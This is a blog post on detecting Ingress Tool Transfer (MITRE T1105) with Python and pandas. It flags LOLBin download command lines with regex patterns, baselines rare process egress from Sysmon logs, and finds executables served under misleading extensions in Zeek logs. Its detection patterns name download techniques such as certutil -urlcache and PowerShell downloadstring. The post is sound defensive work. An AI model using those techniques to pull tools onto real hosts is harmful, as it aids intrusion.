DEV Community

Charles Givre
Charles Givre

Posted on • Originally published at gtkcyber.com

Detecting Ingress Tool Transfer (T1105) with Python

After initial access, attackers almost always need to pull more tooling onto the host: a beacon, a credential dumper, a tunneler. That step is Ingress Tool Transfer (T1105) in MITRE ATT&CK, and it is hard to catch with signatures because the transfer mechanisms are legitimate. certutil, bitsadmin, curl, and PowerShell all download files for normal reasons. The signal is in the combination and the rarity, not the binary itself.

This is where a little data science beats another detection rule. Here is how to hunt T1105 in Python across three layers: the process command line, the process-to-network relationship, and the payload on the wire.

Where T1105 Shows Up in Your Logs

Three sources cover most of it:

  • Sysmon Event ID 1 (process creation) for the download command line and parent process
  • Sysmon Event ID 3 (network connection) to confirm the process actually reached out
  • Zeek http.log (or proxy logs) for the file coming across the wire

You can run all three as pandas DataFrames. No SIEM required, which matters when you are working an exported archive from a host you do not control.

Catching LOLBin Downloaders in the Command Line

Start with the living-off-the-land binaries attackers reach for. Load Sysmon Event ID 1 and flag the download patterns:

import pandas as pd

proc = pd.read_csv("sysmon_eid1.csv")  # UtcTime, Image, CommandLine, ParentImage, ProcessGuid

# Download patterns by LOLBin (see the LOLBAS project)
patterns = {
    "certutil":   r"certutil.*(-urlcache|-f|-split).*http",
    "bitsadmin":  r"bitsadmin.*(/transfer|/addfile)",
    "powershell": r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)",
    "mshta":      r"mshta.*http",
    "curl_wget":  r"\b(curl|wget)\b.*http",
}

cmd = proc["CommandLine"].fillna("").str.lower()
for name, rx in patterns.items():
    proc[name] = cmd.str.contains(rx, regex=True, na=False)

suspect = proc[proc[list(patterns)].any(axis=1)]
Enter fullscreen mode Exit fullscreen mode

This catches the noisy cases. It will also fire on legitimate admin activity, so the command line alone is a lead, not a verdict. The next two layers are what cut the false positives.

Beyond Signatures: Rare Process-to-Network Pairs

The stronger signal for T1105 is a process that does not normally talk to the internet suddenly making an external connection. Build a baseline from Sysmon Event ID 3 and flag the rare pairs:

import ipaddress

net = pd.read_csv("sysmon_eid3.csv")  # Image, DestinationIp, DestinationPort, DestinationHostname

def is_external(ip):
    try:
        return not ipaddress.ip_address(ip).is_private
    except ValueError:
        return False

ext = net[net["DestinationIp"].map(is_external)].copy()
ext["proc"] = ext["Image"].str.lower()

# How often does each process talk externally across the whole environment?
freq = ext.groupby("proc")["DestinationIp"].count()
rare = freq[freq <= 3].index            # processes that almost never egress

flagged = ext[ext["proc"].isin(rare)]
Enter fullscreen mode Exit fullscreen mode

certutil.exe or notepad.exe opening an external connection lands in rare because, fleet-wide, those processes almost never egress. Tune the <= 3 threshold to your environment size. For a more principled version, score each (process, destination) pair by frequency and treat the long tail as the hunt queue, which is the same idea behind scikit-learn's rarity-based anomaly methods without the model overhead.

Catching the Payload on the Wire

Attackers rename payloads, so do not trust the file extension. Zeek records the actual response MIME type, which is what you want. Parse http.log and filter for executable content regardless of how the URL ends:

def load_zeek(path):
    cols = None
    with open(path) as f:
        for line in f:
            if line.startswith("#fields"):
                cols = line.strip().split("\t")[1:]
                break
    return pd.read_csv(path, sep="\t", comment="#", names=cols,
                       na_values=["-", "(empty)"])

http = load_zeek("http.log")  # ts, host, uri, method, resp_mime_types, user_agent

exe_mimes = ["application/x-dosexec", "application/x-msdownload", "application/octet-stream"]
downloads = http[http["resp_mime_types"].fillna("").str.contains("|".join(exe_mimes), regex=True)]

# A .jpg URL that returns a PE file is a strong T1105 lead
downloads["ext"] = downloads["uri"].str.extract(r"\.([a-z0-9]{1,5})(?:\?|$)", expand=False)
mismatched = downloads[~downloads["ext"].isin(["exe", "dll", "msi", None])]
Enter fullscreen mode Exit fullscreen mode

A URI ending in .jpg that returns application/x-dosexec is the kind of mismatch that almost never has a benign explanation. Pair it with the rare-egress process list above and you have high-confidence T1105 without a single static signature.

Putting It Together

The three layers reinforce each other. The command-line patterns give you candidate processes, the rare process-to-network baseline tells you which ones are abnormal, and the wire data confirms an executable actually moved. A finding that lights up all three is worth waking someone for. One layer alone is a lead to triage.

This is the workflow we teach in GTK Cyber's Threat Hunting with Data Science course: building detections from log data and statistics rather than waiting for a vendor signature. If you want the full reference on the technique itself, the T1105 page has the ATT&CK detail and related techniques, and the threat hunting pipeline post shows how to wire these queries into something repeatable.

Top comments (0)